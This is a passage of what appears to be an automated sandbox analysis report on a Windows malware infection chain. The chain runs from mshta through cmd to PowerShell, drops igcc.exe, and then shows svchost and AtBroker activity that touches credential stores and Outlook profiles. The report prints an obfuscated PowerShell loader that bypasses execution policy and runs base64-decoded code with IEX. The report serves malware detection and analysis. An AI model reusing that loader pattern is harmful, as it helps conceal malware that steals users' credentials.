                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: rasadhlp.dll
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Section loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: wininet.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: ieframe.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: netapi32.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: version.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: mlang.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: propsys.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: winsqlite3.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: vaultcli.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: wintypes.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Section loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\mshta.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                  Source: C:\Windows\SysWOW64\mshta.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\SysWOW64\AtBroker.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                  Source: Binary string: ATBroker.pdb source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: igcc.exe, 0000000C.00000003.1362520045.0000000004020000.00000004.00001000.00020000.00000000.sdmp, igcc.exe, 0000000C.00000003.1360820679.0000000003E30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000D.00000002.1610420128.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1507905161.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1509975834.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1610420128.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.00000000052CE000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1612443700.0000000004F80000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000003.1609657209.0000000004DD2000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000010.00000002.3666132989.0000000005130000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.pdb source: powershell.exe, 00000003.00000002.1374616824.0000000004991000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 0000000D.00000003.1576499115.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1576388151.000000000341B000.00000004.00000020.00020000.00000000.sdmp, WRNKS5Hlc0y.exe, 0000000F.00000003.1681787984.0000000000548000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664843128.000000000062F000.00000002.00000001.01000000.0000000A.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\mshta.exe  Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exe  Process created: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'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'+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline"
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_00014B37 LoadLibraryA,GetProcAddress, 12_2_00014B37
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00A956D2 push esp; ret 3_2_00A95711
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_0001C508 push A30001BAh; retn 0001h 12_2_0001C50D
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_00038945 push ecx; ret 12_2_00038958
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_0041E85A push cs; ret 13_2_0041E85D
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_0041A963 push edi; retf 13_2_0041A96E
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_00411BB0 pushfd ; ret 13_2_00411BB1
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_0041EC21 push 00000043h; iretd 13_2_0041EC23
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_00403430 push eax; ret 13_2_00403432
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_00414483 push edi; retf 13_2_0041448E
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_00418566 push esp; ret 13_2_00418567
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_004015D0 push esp; ret 13_2_004015D2
                  Source: C:\Windows\SysWOW64\svchost.exe  Code function: 13_2_03A309AD push ecx; mov dword ptr [esp], ecx 13_2_03A309B6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A4FFAB push es; retf 15_2_06A5007E
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A3F785 push B53FFD23h; retf 15_2_06A3F78A
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A46CE8 pushfd ; ret 15_2_06A46CE9
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A495BB push edi; retf 15_2_06A495C6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A53D59 push 00000043h; iretd 15_2_06A53D5B
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A4FA9B push edi; retf 15_2_06A4FAA6
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A4E0A0 push 0000007Eh; retf 15_2_06A4E0AF
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A4D860 pushad ; ret 15_2_06A4D873
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A4D85D push ecx; ret 15_2_06A4D85E
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe  Code function: 15_2_06A53992 push cs; ret 15_2_06A53995
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Roaming\igcc.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  File created: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.dll

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_000148D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_000148D7
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_00095376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_00095376
                  Source: C:\Users\user\AppData\Roaming\igcc.exe  Code function: 12_2_00033187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_00033187
                  Source: C:\Windows\SysWOW64\mshta.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Roaming\igcc.exe API/Special instruction interceptor: Address: 1455194
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D324
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D7E4
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D944
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D504
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D544
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372D1E4
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC3730154
                  Source: C:\Windows\SysWOW64\AtBroker.exe API/Special instruction interceptor: Address: 7FFCC372DA44
                  Source: C:\Windows\SysWOW64\svchost.exe Code function: 13_2_03A5BBA0 rdtsc 13_2_03A5BBA0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 9987
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5860
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3864
                  Source: C:\Windows\SysWOW64\AtBroker.exe Window / User API: threadDelayed 3919
                  Source: C:\Windows\SysWOW64\AtBroker.exe Window / User API: threadDelayed 6054
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.dll
                  Source: C:\Users\user\AppData\Roaming\igcc.exe API coverage: 4.5 %
                  Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 7576 Thread sleep count: 9987 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764 Thread sleep count: 5860 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 3864 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7812 Thread sleep time: -11068046444225724s >= -30000s
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028 Thread sleep time: -85000s >= -30000s
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028 Thread sleep count: 32 > 30
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028 Thread sleep time: -48000s >= -30000s
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028 Thread sleep count: 37 > 30
                  Source: C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\WRNKS5Hlc0y.exe TID: 8028 Thread sleep time: -37000s >= -30000s
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924 Thread sleep count: 3919 > 30
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924 Thread sleep time: -7838000s >= -30000s
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924 Thread sleep count: 6054 > 30
                  Source: C:\Windows\SysWOW64\AtBroker.exe TID: 7924 Thread sleep time: -12108000s >= -30000s
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                  Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007445A GetFileAttributesW,FindFirstFileW,FindClose, 12_2_0007445A
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007C6D1 FindFirstFileW,FindClose, 12_2_0007C6D1
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 12_2_0007C75C
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0007EF95
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 12_2_0007F0F2
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0007F3F3
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_000737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_000737EF
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_00073B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 12_2_00073B12
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_0007BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 12_2_0007BCBC
                  Source: C:\Users\user\AppData\Roaming\igcc.exe Code function: 12_2_000149A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 12_2_000149A0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: powershell.exe, 00000003.00000002.1374616824.00000000046C7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: WRNKS5Hlc0y.exe, 0000000F.00000002.3664314153.0000000000547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg>Y
